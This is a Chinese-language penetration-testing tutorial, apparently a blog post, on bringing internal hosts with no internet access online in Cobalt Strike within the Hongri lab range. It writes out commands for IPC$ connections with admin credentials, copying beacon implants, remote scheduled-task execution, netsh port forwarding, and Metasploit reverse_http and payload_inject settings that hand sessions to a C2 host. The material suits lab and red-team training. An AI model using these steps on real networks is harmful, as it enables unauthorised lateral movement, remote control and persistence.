内网渗透之不出网上线CobaltStrike技巧

目录

• 前言
• smb beacon上线
• tcp listener转发上线
• http代理上线
• tcp beacon正向连接上线
• 题外话 — cs和msf的权限传递
  • cs派生给msf
  • msf派生给cs

前言

出网or不出网？

目标可以正常访问互联网，可直接在目标机挂socks代理或直接CS上线。而更多的情况是，内网中的服务器和主机不通外网，这样通常情况是无法直接实现CS上线操作的。

不出网的原因无外乎两种：

• 网络协议被限制

• 网络通信不通

解决办法也有两种：

• 隧道技术：将一种网络协议的数据封装在另一种网络协议的数据包中传输，绕过网络协议的限制

• 代理技术：利用出网的跳板机作为代理，间接上线不出网的主机

环境搭建：

内网环境继续使用之前的红日靶场：作为web服务器的win7主机采用双网卡，内网windows 2008不出网。

smb beacon上线

官网介绍：

SMB Beacon使用命名管道通过父级Beacon进行通信，当两个Beacon连接后，子Beacon从父Beacon获取到任务并发送。因为连接的Beacon使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽。

上面这个图就可以说明它们之间的关系，上线跳板机的是父Beacon，SMB Beacon作为子Beacon获取任务通过SMB隧道发送给目标主机。

SMB Beacon的使用条件如下：

• 具有SMB Beacon的主机必须接受445端口上的连接

• 只能链接由同一个CobaltStrike实例管理的Beacon

• 利用这种Beacon横移必须有目标主机的管理员权限或者拥有具有管理员权限的凭据

使用HTTP Beacon上线win7跳板机：

创建一个SMB Beacon监听器：

进入Beacon控制台，输入spawn SMB Beacon的监听器名称派生会话，运行成功后在external中可以看到IP后有个∞∞字符的派生SMB Beacon。

下一步利用派生的SMB Beacon来上线不出网主机，前提是已知目标机器的管理员账号的明文密码或密码哈希，利用SMB Beacon正向连接让其上线。

抓取hash和明文密码，获取密码凭证，选择目标主机OWA（win 2008）选择使用psexec64横向移动：

内网OWA主机成功上线：

运行成功后在external中可以看到IP后有个∞∞字符，这是派生的SMB Beacon。

tcp listener转发上线

在已上线的win7跳板机创建listener，设置监听器代理转发：

转发监听器可以利用己攻陷的win7作为代理，为其他Beacon会话的中转网络流量：

生成一个stageless木马：

将木马上传至win7跳板机：

与目标主机建立IPC$连接：

shell net use \\192.168.52.138\C$ /user:Administrator "hongrisec@2019"

将win7跳板机的木马文件copy到目标主机的C共享盘下：

shell copy C:\phpStudy\WWW\beacon_x64.exe \\192.168.52.138\C$

远程创建目标主机计划任务执行木马：

shell schtasks /create /s 192.168.52.138 /u Administrator /p "hongrisec@2019" /sc MINUTE /mo 1 /tn test /tr "C:\beacon_x64.exe"

此时跳板机4444端口监听器会等待目标主机木马反弹连接，然后将流量转发到cs上线。

http代理上线

需要使用到代理工具goproxy来搭建http代理，项目地址：https://github.com/snail007/goproxy

上传proxy.exe到web服务器，在8080端口开启http代理：

shell C:\phpStudy\WWW\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

然后再使用netsh命令在win7跳板机上做一个端口转发，将内网的822端口转发到外网的8080上：

netsh interface portproxy add v4tov4 listenaddress=192.168.52.143 listenport=3422 connectaddress=192.168.88.146 connectport=8080

设置一个HTTP Beacon监听器，http代理设置为win7跳板机内网的822端口：

生成一个stageless木马，选择为刚才设置过http代理的监听器：

然后将生成的木马上传至win7跳板机，再由跳板机与目标主机建立IPC$连接，将木马上传到目标主机，远程创建目标机计划任务执行木马。

木马会去连接822端口，win7再将822端口的http流量转发到外网的8080，最后由8080端口将流量转发到cs上线。

连接过程：

192.168.52.138(OWA) --> 192.168.52.143:822 --> 192.168.88.146:8080 --> 192.168.88.128:81(CS)

遇到一个很头疼的问题，当执行netsh命令后，在0.0.0.0监听的8080就消失了......

tcp beacon正向连接上线

tcp beacon正向连接和smb上线很类似，smb beacon是主动连接目标主机445端口建立smb隧道。而tcp正向连接是利用已上线跳板机主动与上传了木马的目标主机建立tcp连接，从而上线目标主机。

设置一个tcp正向连接的监听器：

使用tcp正向连接的监听器生成stageless木马：

还是上面一样，还是利用跳板机与目标主机建立IPC$连接，上传木马到目标主机：

shell net use \\192.168.52.138\C$ /user:Administrator "hongrisec@2019"

shell copy C:\phpStudy\WWW\b_beacon_x64.exe \\192.168.52.138\C$

跳板机执行connect指令连接目标主机木马：

内网OWA主机成功上线。

题外话 — cs和msf的权限传递

当目标上线cs以后，可以轻松地将cs权限转移到msf上，继续借助msf完成后续的渗透。

环境：msf6 + cs4.8

cs派生给msf

1）在msf上启用reverse_http模块监听本地端口：

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4444

2）在cs上创建一个foreign http监听，ip和端口设置为msf监听的ip和端口：

Foreign监听器支持与其他软件的监听器进行派生（spawn）

3）右键 —> 凭证提权 —> 新建会话 —> 选择创建的foreign http监听：

msf成功拿到会话：

msf派生给cs

条件：msf已获取meterpreter shell

在cs上创建一个http beacon的监听器：

msf启用payload_inject模块，将ip和端口设置为cs监听的ip和端口：

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4567
set session 1
set DisablePayloadHandler true

注意：msf的payload和cs的监听器要保持一致

cs成功拿到会话：

总结：

对于这种边缘主机可以出网的情况，主要思路就是借助边缘的跳板机反向代理把内网主机带出来，再或者是跳板机正向去连接内网主机。反向代理的一个缺点就是，内网主机在出网的时候需要经过各种转发，所谓步骤越多就越容易失败......个人感觉在内网渗透时条件允许的情况下，首选正向连接，会比较稳定。

参考文章：

https://xz.aliyun.com/t/13918

https://xz.aliyun.com/t/8671

---

若有错误，欢迎指正！o(￣▽￣)ブ